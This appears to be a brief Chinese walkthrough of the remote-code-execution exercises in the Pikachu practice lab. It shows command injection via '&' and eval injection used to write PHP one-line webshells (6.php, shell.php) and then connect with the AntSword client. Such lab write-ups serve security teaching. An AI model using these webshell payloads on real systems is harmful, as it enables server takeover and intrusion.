Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
被摘下的星星几秒前
传输控制协议(TCP)
服务器·网络·tcp/ip
想拿大厂offer3 分钟前
【Linux】权限
linux·服务器
倔强的石头10612 分钟前
【Linux指南】基础IO系列(七):“一切皆文件” 底层实现 ——struct file 与统一 IO 接口的魔法
linux·运维·服务器
网络小白不怕黑12 分钟前
1.1 VMware部署Rocky Linux 9 (GPT分区表,最小化安装)
linux·服务器·gpt
胡志辉14 分钟前
前端反调试:常见套路、识别方法与绕过思路
前端·安全
qq_2975746715 分钟前
RocketMQ 系列文章(高级篇第 1 篇):高可用集群部署与运维监控实战指南
运维·rocketmq·java-rocketmq
代码飞一会儿18 分钟前
CTF之信息泄漏——你什么都没说但什么都告诉了我
安全
克莱因35819 分钟前
思科Cisco 静态NAT
服务器·网络·思科
恒创科技HK19 分钟前
Windows香港云服务器新开注意事项(含远程连接教程)
运维·服务器·windows
满天星830357720 分钟前
【Linux/多路复用】poll和epoll的使用
linux·服务器·c++·后端